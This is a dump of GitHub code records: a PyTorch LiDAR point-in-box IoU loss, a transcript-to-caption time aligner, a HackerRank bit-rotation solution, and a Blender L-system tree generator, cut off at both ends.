diretorio_imagens_bola, constantes.IMAGEM_BOLA)).convert_alpha()\n","repo_name":"gsillva18/Fire-Ball-Game","sub_path":"fireball/classes/tela_inicio.py","file_name":"tela_inicio.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1812983565","text":"import torch\nimport torch.nn as nn\nfrom ops.roiaware_pool3d import roiaware_pool3d_cuda\nimport matplotlib.pyplot as plt\nfrom cnn_utils import draw_box_plt\nfrom utils import common_utils\n\nclass PointsLoss(nn.Module):\n def __init__(self):\n super().__init__()\n return\n\n def forward(self, added_points, original_points, boxes, ego_loc):\n \"\"\"\n :param added_points: prdicted points\n :param original_point:\n :param boxes:\n :return:\n \"\"\"\n original_points = original_points[:, 1:, :, :]\n # matrix to 3d points\n # sum every coop\n\n predicted_points = torch.sum(added_points, dim=1)\n # predicted_points = torch.dot(predicted_points, torch.linalg.inv(tf_ego).float())\n original_points = torch.sum(original_points, dim=1)\n # original_points= torch.dot(original_points, torch.linalg.inv(tf_ego).float())\n # ==========================================vis============================================\n plt.subplot(1,2,1)\n plt.imshow(predicted_points[0,:,:].cpu().detach().numpy())\n plt.subplot(1,2,2)\n plt.imshow(original_points[0,:,:].cpu().detach().numpy())\n 
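# Note on the figure below (descriptive only): the left panel shows the\n        # first sample of predicted_points and the right panel the matching\n        # original_points, both already summed over the cooperator axis (dim=1)\n        # above, so diff.png gives a quick side-by-side visual check.\n        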
plt.savefig('diff.png')\n plt.close()\n\n # =========================================================================================\n\n # for every frame\n batch_size = original_points.shape[0]\n p = []\n o = []\n for i in range(batch_size):\n p.append(torch.nonzero(predicted_points[i,:,:], as_tuple=False))\n o.append(torch.nonzero(original_points[i,:,:], as_tuple=False))\n boxes_frame = boxes\n # fill with zeros\n if len(p[0]) > len(p[1]):\n p[1]=torch.cat((p[1],torch.zeros(len(p[0]) - len(p[1]),2).cuda()),dim=0)\n else:\n p[0] = torch.cat((p[0], torch.zeros(len(p[1]) - len(p[0]),2).cuda()),dim=0)\n if len(o[0]) > len(o[1]):\n o[1] = torch.cat((o[1], torch.zeros(len(o[0]) - len(o[1]), 2).cuda()), dim=0)\n else:\n o[0] = torch.cat((o[0], torch.zeros(len(o[1]) - len(o[0]), 2).cuda()), dim=0)\n predicted_points_idx = torch.stack(p, 0)-128\n original_points_idx = torch.stack(o, 0)-128\n # set z = 1\n y1 = torch.zeros(2, predicted_points_idx.shape[1], 1).cuda()\n predicted_points_idx = torch.cat((predicted_points_idx, y1), dim=2)*0.8\n y2 = torch.zeros(2, original_points_idx.shape[1], 1).cuda()\n original_points_idx = torch.cat((original_points_idx, y2), dim=2)*0.8\n\n # =============================vis============================================\n ax = plt.figure(figsize=(8, 8)).add_subplot(1, 1, 1)\n points = predicted_points_idx.cpu()\n ax.plot(points[0,:, 0], points[0,:, 1], 'b.', markersize=0.5)\n boxes_frame[:,:,0:2] = boxes_frame[:,:,0:2] - ego_loc[:,None,:]\n ax = draw_box_plt(boxes_frame[0,:,:], ax, color='green')\n # ax = draw_box_plt(pred_boxes[0], ax, color='red')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.savefig('temp.png')\n plt.close()\n # ==============================================================================\n for i in range(batch_size):\n idx_original = self.points_in_boxes_gpu(original_points_idx[i,:,:].float().unsqueeze(0), boxes_frame[i,:,:].float().unsqueeze(0))\n idx_predict = self.points_in_boxes_gpu(predicted_points_idx[i,:,:].float().unsqueeze(0), boxes_frame[i,:,:].float().unsqueeze(0))\n\n o_idx = torch.where(idx_original != -1)\n p_idx = torch.where(idx_predict != -1)\n n_object = original_points_idx[o_idx]\n n_predict = predicted_points_idx[p_idx]\n\n # in grid\n n_object_grid = torch.zeros(256, 256)\n n_predict_grid = torch.zeros(256, 256)\n x =n_object[:, 0]\n y =n_object[:, 1]\n inds_x = (x / 0.8 + 256 / 2).long()\n inds_y = (y / 0.8 + 256 / 2).long()\n n_object_grid[inds_x, inds_y] = 1\n n_object_grid = n_object_grid.bool()\n\n x1 = n_predict[:, 0]\n y1 = n_predict[:, 1]\n inds_x = (x1 / 0.8 + 256 / 2).long()\n inds_y = (y1 / 0.8 + 256 / 2).long()\n n_predict_grid[inds_x, inds_y] = 1\n n_predict_grid = n_predict_grid.bool()\n intersection = ((n_object_grid & n_predict_grid)==True).sum().float()\n union = ((n_object_grid | n_predict_grid)==True).sum().float()\n iou = intersection/union\n return iou\n\n def points_in_boxes_gpu(self, points, boxes):\n \"\"\"Find points that are in boxes (CUDA)\n Args:\n points (torch.Tensor): [B, M, 3], [x, y, z] in LiDAR coordinate\n boxes (torch.Tensor): [B, T, 7],\n num_valid_boxes <= T, [x, y, z, w, l, h, ry] in LiDAR coordinate,\n (x, y, z) is the bottom center\n Returns:\n box_idxs_of_pts (torch.Tensor): (B, M), default background = -1\n \"\"\"\n assert boxes.shape[0] == points.shape[0]\n assert boxes.shape[2] == 7 and points.shape[2] == 3\n batch_size, num_points, _ = points.shape\n\n box_idxs_of_pts = points.new_zeros((batch_size, num_points), dtype=torch.int).fill_(-1)\n # If manually put the tensor 'points' or 
'boxes' on a device\n # which is not the current device, some temporary variables\n # will be created on the current device in the cuda op,\n # and the output will be incorrect.\n # Therefore, we force the current device to be the same\n # as the device of the tensors if it was not.\n # Please refer to https://github.com/open-mmlab/mmdetection3d/issues/305\n # for the incorrect output before the fix.\n points_device = points.get_device()\n assert points_device == boxes.get_device(), \\\n 'Points and boxes should be put on the same device'\n if torch.cuda.current_device() != points_device:\n torch.cuda.set_device(points_device)\n roiaware_pool3d_cuda.points_in_boxes_gpu(boxes.contiguous(), points.contiguous(), box_idxs_of_pts)\n\n return box_idxs_of_pts\n\n def points_in_boxes_cpu(self, points, boxes):\n \"\"\"\n Args:\n points: (num_points, 3)\n boxes: [x, y, z, dx, dy, dz, heading], (x, y, z) is the box center, each box DO NOT overlaps\n Returns:\n point_indices: (N, num_points)\n \"\"\"\n assert boxes.shape[1] == 7\n assert points.shape[1] == 3\n points, is_numpy = common_utils.check_numpy_to_torch(points)\n boxes, is_numpy = common_utils.check_numpy_to_torch(boxes)\n\n point_indices = points.new_zeros((boxes.shape[0], points.shape[0]), dtype=torch.int)\n roiaware_pool3d_cuda.points_in_boxes_gpu(boxes.float().contiguous(), points.float().contiguous(), point_indices)\n\n return point_indices.numpy() if is_numpy else point_indices","repo_name":"YuqiaoBai/cia_ssd","sub_path":"CNN/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"9125985441","text":"import re\nfrom math import ceil\n\n\n# CLASS\nclass Aligner:\n \"\"\"\n Class that does the aligning of text according to a rule.\n \"\"\"\n\n # Dunder methods\n def __init__(self, transcript, timetable):\n \"\"\"\n Initialisation method.\n\n Args:\n transcript (str):\n The raw transcript of the audio.\n\n timetable (list[dict]):\n The timetable of the spoken words, as returned by the gentle interface.\n \"\"\"\n\n # Object attributes\n self.transcript = transcript\n self.timetable = timetable\n self.duration = int(ceil(timetable[-1][\"end\"])) # Get the time that the last word was spoken\n\n # Methods\n def align_time(self, block_duration=5):\n \"\"\"\n Method that aligns the transcript by time.\n\n Args:\n block_duration (float):\n The length of time that makes up each block.\n Every block will have its own transcript section.\n (Default = 5)\n\n Returns:\n list[dict]:\n The aligned text dictionary.\n\n Raises:\n AssertionError:\n - If the value of `block_duration` is less than 3.\n - If `self.duration` is less than or equal to `block_duration`.\n \"\"\"\n\n # Assert that the value of `block_duration` is valid\n assert block_duration >= 3, \"The value of `block_duration` must be more than 3.\"\n assert self.duration > block_duration, \"The length of the audio file is less than the block \" \\\n f\"duration {block_duration}.\"\n\n # Calculate the number of blocks\n num_blocks = int(ceil(self.duration / block_duration))\n\n # Count the total number of processed words\n num_processed_words = len(self.timetable) # Of course, some of the words may not have been processed\n\n # Start creating the aligned transcript\n aligned_words = []\n curr_processed_word_index = 0 # Stores the current processed word index\n\n for block_num in range(num_blocks):\n # Get as many words as possible before exceeding the block\n 
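# For example, assuming block_duration=5 (the default), block 0 keeps\n            # collecting words whose \"end\" time is at most 5.0s and stops at the\n            # first word ending after that (hypothetical timings, for illustration).\n            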
start_processed_word_index = curr_processed_word_index\n\n while curr_processed_word_index < num_processed_words:\n # Get the current word\n curr_word = self.timetable[curr_processed_word_index]\n\n # Check if the ending of that word is still in the block\n if \"end\" in curr_word and curr_word[\"end\"] > (block_num + 1) * block_duration:\n # The ending exceeded the block => the block has ended, so break\n break\n\n # The word is still in the block, append to the list of block words\n curr_processed_word_index += 1\n\n # Get the index of the last processed word inside the block\n end_processed_word_index = curr_processed_word_index - 1 # The current word is not in the block\n\n # Get the processed words that are attributed to those two indices\n start_processed_word = self.timetable[start_processed_word_index]\n end_processed_word = self.timetable[end_processed_word_index]\n\n # Find all the words that are in between those two words\n words = self.transcript[start_processed_word[\"startOffset\"]:end_processed_word[\"endOffset\"] + 1].strip()\n\n # Clean up the words\n words = re.sub(r\"\\s+\", \" \", words.replace(\"\\n\", \" \")) # Replace newlines with a single space\n\n # Add more info to the words\n dict_with_more_info = {\n \"start_time\": block_num * block_duration,\n \"end_time\": (block_num + 1) * block_duration,\n \"text\": words\n }\n\n # Append that dictionary to the `aligned_words` list\n aligned_words.append(dict_with_more_info)\n\n # Return the `aligned_words` list\n return aligned_words\n\n def align_sentence(self, max_block_length=15):\n \"\"\"\n Method that aligns the transcript by sentence.\n\n Args:\n max_block_length (int):\n The maximum number of timetabled words that can be in each caption block.\n This value must be a positive integer.\n (Default = 15)\n\n Returns:\n list[dict]:\n The aligned text dictionary.\n\n Notes:\n - A sentence is defined to be a string of text that ends with a punctuation mark (\".\", \"?\" and \"!\" only).\n \"\"\"\n\n # Define sentence ending characters\n sentence_ending_characters = [\".\", \"!\", \"?\"]\n\n # Iterate through every timetable word\n aligned_words = [] # Stores the sentences with the start and end times\n block_start_time = None # The starting time of the current caption block\n block_end_time = None # The ending time of the current caption block\n block_start_index = None # The starting index of the current caption block\n block_length = 0 # Stores the length of the current caption block\n start_of_sentence = True # Whether the current word is the start of a new sentence\n\n for timetable_word in self.timetable:\n # Update the block's starting time & starting index, if needed\n if block_start_time is None:\n # Set the block's starting index\n block_start_index = timetable_word[\"startOffset\"]\n\n # Check if the current word has a \"start\" key\n if \"start\" in timetable_word:\n block_start_time = timetable_word[\"start\"]\n else:\n # Use the end time of the previous block instead\n block_start_time = block_end_time\n\n # Update the `start_of_sentence` variable\n start_of_sentence = True\n\n # Find the starting and ending character's position\n start_pos = timetable_word[\"startOffset\"]\n end_pos = timetable_word[\"endOffset\"] # This is the position of the character that is one after the word\n\n # Check if the sentence ends on the current word\n # We do this by checking if the current character is one of the `sentence_ending_characters` and the\n # character after that is not a space.\n if self.transcript[end_pos] in 
sentence_ending_characters and self.transcript[end_pos + 1].isspace():\n # Set the time which the current caption block ends\n if \"end\" in timetable_word:\n block_end_time = timetable_word[\"end\"]\n else:\n # Extrapolate the time based off the speed of reading\n second_per_char = block_start_time / block_start_index # Speed of reading each character\n block_end_time = second_per_char * end_pos\n\n # Create the dictionary that will go into the `aligned_words` array\n text = self.transcript[block_start_index:end_pos + 1] # Get text from transcript\n text = re.sub(r\"\\s+\", \" \", text.strip().replace(\"\\n\", \" \")) # Process the text for display\n\n aligned_words.append({\n \"start_time\": block_start_time,\n \"end_time\": block_end_time,\n \"text\": text\n })\n\n # Update the block's starting time, starting index and block length\n block_start_time = None # Wait for the new word to override this\n block_start_index = None # Wait for the new word to override this\n block_length = 0\n\n # Check if this is the start of a new sentence\n elif start_of_sentence:\n # Ignore and move on\n pass\n\n # Check if the sentence ended on the previous word\n else:\n # Get the non-whitespace character that is to the left of the word\n non_whitespace_char_pos = start_pos - 2 # Ignore the previous character as it is likely to be a space\n\n while self.transcript[non_whitespace_char_pos].isspace():\n non_whitespace_char_pos -= 1\n\n # Check if that character is one of the sentence ending characters\n if self.transcript[non_whitespace_char_pos] in sentence_ending_characters:\n # Set the time which the current caption block ends\n if \"start\" in timetable_word:\n block_end_time = timetable_word[\"start\"] # We don't have the previous word's end time\n else:\n # Extrapolate the time based off the speed of reading\n second_per_char = block_start_time / block_start_index # Speed of reading each character\n block_end_time = second_per_char * non_whitespace_char_pos\n\n # Create the dictionary that will go into the `aligned_words` array\n text = self.transcript[block_start_index:non_whitespace_char_pos + 1]\n text = re.sub(r\"\\s+\", \" \", text.strip().replace(\"\\n\", \" \")) # Process the text for display\n\n aligned_words.append({\n \"start_time\": block_start_time,\n \"end_time\": block_end_time,\n \"text\": text\n })\n\n # Update the block's starting time, starting index and block length\n block_start_time = block_end_time # The sentence already started\n block_start_index = timetable_word[\"startOffset\"]\n block_length = 1 # We already have one word\n\n # Check if the `block_length` has exceeded or equals the `max_block_length`\n elif block_length >= max_block_length:\n # Set the time which the current caption block ends\n if \"start\" in timetable_word:\n block_end_time = timetable_word[\"end\"]\n else:\n # Extrapolate the time based off the speed of reading\n second_per_char = block_start_time / block_start_index # Speed of reading each character\n block_end_time = second_per_char * end_pos\n\n # Create the dictionary that will go into the `aligned_words` array\n text = self.transcript[block_start_index:end_pos + 1]\n text = re.sub(r\"\\s+\", \" \", text.strip().replace(\"\\n\", \" \")) # Process the text for display\n\n aligned_words.append({\n \"start_time\": block_start_time,\n \"end_time\": block_end_time,\n \"text\": text\n })\n\n # Update the block's starting time\n block_start_time = block_end_time # Continue the sentence in the next block\n block_start_index = end_pos + 1 # Exclude the space 
before the word\n                block_length = 0  # Reset the length of each block back to 0\n\n            # Update the value of `start_of_sentence` and `block_length`\n            start_of_sentence = False\n            block_length += 1  # Added one more timetabled word\n\n        # Return the `aligned_words` array\n        return aligned_words\n\n\n# TESTING CODE\nif __name__ == \"__main__\":\n    # Imports\n    import ast\n\n    # Read the timetable and transcript\n    aTranscript = open(\"../../TranscriptClean.txt\", \"r\").read()\n    aTimetable = ast.literal_eval(open(\"TestResponse.txt\", \"r\").read())\n\n    # Create an `Aligner` object\n    aligner = Aligner(aTranscript, aTimetable)\n\n    # Align the words\n    alignedWords = aligner.align_sentence()\n    print(alignedWords)\n","repo_name":"PhotonicGluon/Video-To-Captions","sub_path":"src/timetable_fixing/transcript_aligner.py","file_name":"transcript_aligner.py","file_ext":"py","file_size_in_byte":11883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30918546915","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n\r\n#\r\n# Complete the 'maximumPower' function below.\r\n#\r\n# The function is expected to return an INTEGER.\r\n# The function accepts STRING s as parameter.\r\n#\r\n\r\ndef maximumPower(s):\r\n    i = 0\r\n    max_val = 0\r\n    while i < len(s):\r\n        rotated_str = s[-1] + s[:-1]\r\n        print(rotated_str)\r\n        s = rotated_str\r\n        if max_val < int(s, 2) and int(s, 2) % 2 == 0:\r\n            max_val = int(s, 2)\r\n        i = i + 1\r\n    return int(math.sqrt(max_val & (~(max_val - 1))))\r\n\r\n\r\nif __name__ == '__main__':\r\n    s = input()\r\n    result = maximumPower(s)\r\n    print(result)\r\n","repo_name":"devs-93/Problem-Solving-Python","sub_path":"HackerRank HackFest 2020 /Strictly Increasing Sequence.py","file_name":"Strictly Increasing Sequence.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11045467215","text":"#math imports\nfrom random import random\nfrom math import radians, degrees, atan2, sqrt, copysign, acos, cos\n\n#python import\nimport copy\n\n#blender imports\nimport mathutils\nfrom mathutils import Quaternion, Vector\nimport bpy\n\nclass Turtle(object):\n    #perform the turtle movements\n    \n    #attributes of Turtle class\n    dir = Vector([0.0, 0.0, 1.0])\n    pos = Vector([0.0, 0.0, 0.0])\n    right = Vector([-1.0, 0.0, 0.0])\n    width = 0.0\n    \n    def __init__(self, dir, pos, right, width):\n        self.dir = dir\n        self.pos = pos\n        self.right = right\n        self.width = width\n        \n        self.dir.normalize()\n        self.right.normalize()\n    \n    def yaw(self, ang):\n        #positive angle moves to the right\n        axis = self.dir.cross(self.right)\n        axis.normalize()\n        \n        rot = Quaternion(axis, radians(ang))\n        \n        self.dir.rotate(rot)\n        self.dir.normalize()\n        self.right.rotate(rot)\n        self.right.normalize()\n    \n    def pitch(self, ang):\n        #positive angle raises the turtle's nose\n        self.dir.rotate(Quaternion(self.right, radians(ang)))\n        self.dir.normalize()\n    \n    def roll(self, ang):\n        #positive angle turns right\n        self.right.rotate(Quaternion(self.dir, radians(ang)))\n        self.right.normalize()\n    \n    def move(self, step):\n        #move the turtle forward\n        self.pos += self.dir * step\n\n    def setWidth(self, width):\n        self.width = width\n    \n    def resetVertical(self):\n        self.dir = Vector([0.0, 0.0, 1.0])\n        self.right = Vector([-1.0, 0.0, 0.0])\n    \nclass Branch(object):\n    #attributes\n    polyline = None\n    start = Vector([0,0,0])\n    turtle = None\n    curve = None\n    #handle length\n    tang_l 
= 0.00\n \n def __init__(self, curve, turtle, tropism, trop_const):\n #set tropism\n axis = turtle.dir.cross(tropism)\n rot = Quaternion(axis, trop_const*axis.length)\n turtle.dir.rotate(rot)\n turtle.dir.normalize()\n \n self.polyline = curve.splines.new('BEZIER')\n self.curve = curve\n self.turtle = copy.deepcopy(turtle)\n self.start = self.turtle.pos\n self.polyline.bezier_points[0].co = self.start\n \n self.polyline.bezier_points[0].radius = self.turtle.width\n \n self.polyline.bezier_points[0].handle_left = self.turtle.pos\n self.polyline.bezier_points[0].handle_right = self.turtle.pos\n \n self.tang_l = 1\n \nclass Tree(object):\n #stack to put the branches\n stack = []\n curve = None\n obj = None\n #main Branch object\n stem = None\n #tropism vector and constant\n tropism = Vector([0,0,0])\n trop_const = 0.001\n \n def __init__(self, turtle, tropism, mean_step):\n self.tropism = tropism\n self.trop_const = mean_step/1000\n \n #create and bevel the curve\n self.curve = bpy.data.curves.new(name = \"Tree\",type='CURVE')\n self.curve.dimensions = '3D'\n self.curve.resolution_u = 4\n self.curve.fill_mode = 'FULL'\n self.curve.bevel_depth = 0.045 \n \n #link the object to the scene\n self.obj = bpy.data.objects.new(\"Tree\"+\"Obj\", self.curve)\n bpy.context.scene.collection.objects.link(self.obj)\n \n #create first branch and push into the stack\n self.stack.append(Branch(self.curve, turtle, self.tropism, self.trop_const))\n \n #set the handles to the turtles point\n self.stack[0].polyline.bezier_points[0].handle_left = self.stack[0].turtle.pos\n self.stack[0].polyline.bezier_points[0].handle_right = self.stack[0].turtle.pos\n \n self.stem = self.stack[0]\n \n def move(self, step):\n #update tangent lenght\n self.stem.tang_l = step/10\n #move turtle\n self.stem.turtle.move(step)\n \n #add new point\n self.stem.polyline.bezier_points.add(1)\n self.stem.polyline.bezier_points[-1].co = self.stem.turtle.pos\n \n #handles direction tangent to the curve\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n self.stem.polyline.bezier_points[-1].handle_right = self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #set the curve radius to be the turtle's width\n self.stem.polyline.bezier_points[-1].radius = self.stem.turtle.width\n \n def pitch(self, ang):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #pitch the turtle\n self.stem.turtle.pitch(ang)\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def roll(self, ang):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #roll the turtle\n self.stem.turtle.roll(ang)\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def yaw(self, ang):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #yaw the turtle\n self.stem.turtle.yaw(ang)\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def fork(self):\n #create new 
branch and push into the stack\n self.stack.append(Branch(self.curve, self.stem.turtle, self.tropism, self.trop_const))\n #subscribe stem attribute with a new branch starting from the last vertex\n self.stem = self.stack[-1]\n \n def closeBranch(self):\n #pop out of the stack (set radius to 0 if no one is parent of this branch)\n self.stack.pop()\n #set the radius to 0\n self.stem.turtle.width = 0\n self.stem.polyline.bezier_points[-1].radius = self.stem.turtle.width\n \n #subscribe stem attribute with the previous branch\n if(len(self.stack) != 0): self.stem = self.stack[-1]\n \n def closeZBranch(self):\n #pop out of the stack\n self.stack.pop()\n #subscribe stem attribute with the previous branch\n if(len(self.stack) != 0): self.stem = self.stack[-1]\n \n def setW(self, width):\n #set the curve radius at turtle location\n self.stem.polyline.bezier_points[-1].radius = width\n self.stem.turtle.setWidth(width)\n \n def resetOrientation(self):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #reset orientation of turtle\n self.stem.turtle.resetVertical()\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def multiplyW(self, value):\n #multiply the turtle width by value\n self.stem.turtle.width *= value\n self.stem.polyline.bezier_points[-1].radius = self.stem.turtle.width\n \n \n\"\"\"\nTURTLE SYMBOLS\n\n!(w) Set turtle width to w.\n*(w) Multiply turtle width by w.\nF(l) or f(l) Move turtle forward by l .\n+(a) Turn turtle left by a.\n-(a) Turn turtle right by a.\n&(a) Pitch turtle down by a.\n^(a) Pitch turtle up by a.\n/(a) Roll turtle right by a.\nn(a) Roll turtle left by a.\n[ Start branch.\n] End branch seting radius to 0.\n$ Reset turtle to vertical\n% Set Branch radius to 0\n} End branch without seting radius to 0.\n\n\"\"\"\n\n\"\"\" EXAMPLES OF SEQUENCES \"\"\"\n\n\"\"\" SYMPODIAL TREE \"\"\"\ndef genSympodialSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"A\",[step, len_radius_const*step])])\n res = []\n base_w = len_radius_const*step\n \n #CONSTANTS\n #contraction ratio 1\n r1 = 0.9\n #contraction ratio 2\n r2 = 0.7\n #branching angle 1\n a1 = 10\n #branching angle 2\n a2 = 50\n #principal branching angle\n ap = 20\n #width decrease rate\n wr = 0.657\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n #REWRITE RULES:\n if(x[0] == \"A\"):\n w = x[1][1]\n l = x[1][0]\n \n res += [(\"!\", [w]), (\"F\", [l]), (\"[\", []), (\"&\", [a1]), (\"B\", [l*r1, w*wr]), (\"}\", []), (\"/\", [180]),\n (\"[\", []), (\"&\", [ap]), (\"B\", [l*r2, w*wr]), (\"}\", [])]\n \n elif(x[0] == \"B\"):\n w = x[1][1]\n l = x[1][0]\n \n res += [(\"!\", [w]), (\"F\", [l]), (\"[\", []), (\"+\", [a1]), (\"B\", [l*r1, w*wr]), (\"}\", []),\n (\"[\", []), (\"-\", [a2]), (\"B\", [l*r2, w*wr]), (\"}\", [])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" WILLOW \"\"\"\ndef genWillowSeq(itr, step, len_radius_const):\n #generate sequence that will move 
the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"T\",[]), (\"A\",[])])\n res = []\n base_w = len_radius_const*step\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n #REWRITE RULES:\n if(x[0] == \"T\"):\n res += [(\"!\", [base_w]), (\"F\", [step*1.5]), (\"T\",[])]\n \n elif(x[0] == \"A\"):\n res += [(\"&\", [90]), (\"X\", []), (\"B\", []), (\"B\", []), (\"B\", []), (\"B\", []), (\"B\", []), (\"B\", [])]\n \n elif(x[0] == \"B\"):\n res += [(\"-\", [10]), (\"X\", []), (\"-\", [10]), (\"X\", []), (\"-\", [10]), (\"X\", [])]\n \n elif(x[0] == \"X\"):\n res += [(\"Z\", []), (\"-\", [10]), (\"Z\", []), (\"-\", [10]), (\"Z\", []), (\"-\", [10]), (\"Z\", [])]\n \n elif(x[0] == \"Z\"):\n res += [(\"!\", [base_w*0.2]), (\"%\", [])]\n \n elif(x[0] == \"%\"):\n i = random()\n if(i > 0.5): res += [(\"[\", []), (\"&\", [15]), (\"F\", [step]), (\"%\", []), (\"}\", [])]\n else: res += [(\"[\", []), (\"&\", [25]), (\"F\", [step]), (\"%\", []), (\"!\", [base_w*0.1]), (\"[\", []), (\"-\", [10]), (\"F\", [step]), (\"%\", []),\n (\"}\", []), (\"[\", []), (\"+\", [10]), (\"F\", [step]), (\"%\", []), (\"}\",[]) , (\"}\",[])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" SEAWEED \"\"\"\ndef genSeaweedSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"F\",[step])])\n res = []\n base_w = len_radius_const*step\n ang = 22\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n #REWRITE RULES:\n if(x[0] == \"F\"):\n res += [(\"F\", [step]), (\"F\", [step]), (\"+\", [ang]), (\"[\", []), (\"^\", [ang]), (\"F\", [step]), (\"&\", [ang]),\n (\"F\", [step]), (\"&\", [ang]), (\"F\", [step]), (\"]\", []), (\"-\", [ang]), (\"[\", []), (\"&\", [ang]),\n (\"F\", [step]), (\"^\", [ang]), (\"F\", [step]), (\"^\", [ang]), (\"F\", [step]), (\"]\", []), (\"n\", [step]),\n (\"[\", []), (\"&\", [ang]), (\"f\", [step]), (\"&\", [ang]), (\"f\", [step]), (\"^\", [ang]), (\"f\", [step])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"]\",[])]\n \n return lsys\n\n\"\"\" BUSH \"\"\"\ndef genBushSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"A\",[])])\n res = []\n base_w = len_radius_const*step\n ang = 22.5\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n \n #REWRITE RULES:\n if(x[0] == \"A\"):\n res += [(\"[\", []), (\"&\", [ang]), (\"F\", [step]), (\"*\", [0.8]), (\"A\", []),(\"F\", [step]), (\"]\", []), (\"/\", [ang]),\n (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"[\", []), (\"&\", [ang]), (\"F\", 
[step]),\n (\"*\", [0.8]), (\"A\", [ang]), (\"F\", [step]), (\"]\", []), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]),\n (\"[\", []), (\"&\", [ang]), (\"F\", [step]), (\"*\", [0.8]), (\"A\", []),(\"F\", [step]), (\"]\", [])]\n \n elif(x[0] == \"F\"):\n res += [(\"S\", []), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"F\", [step])]\n \n elif(x[0] == \"S\"):\n res += [ (\"F\", [step]) , (\"L\", [])]\n \n elif(x[0] == \"L\"):\n res += [(\"[\", []), (\"^\", [ang]), (\"^\", [ang]), (\"[\", []), (\"-\", [ang]), (\"f\", [step]), (\"-\", [ang]), (\"f\", [step]),\n (\"]\", []),(\"]\", [])]\n print(1)\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" A NICE TREE \"\"\"\ndef genNiceTreeSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n ##CONSTANTS\n #divergence angle 1\n d1 = 94.74 \n #divergence angle 1 \n d2 = 132.63\n #branching angle\n a = 30.95\n 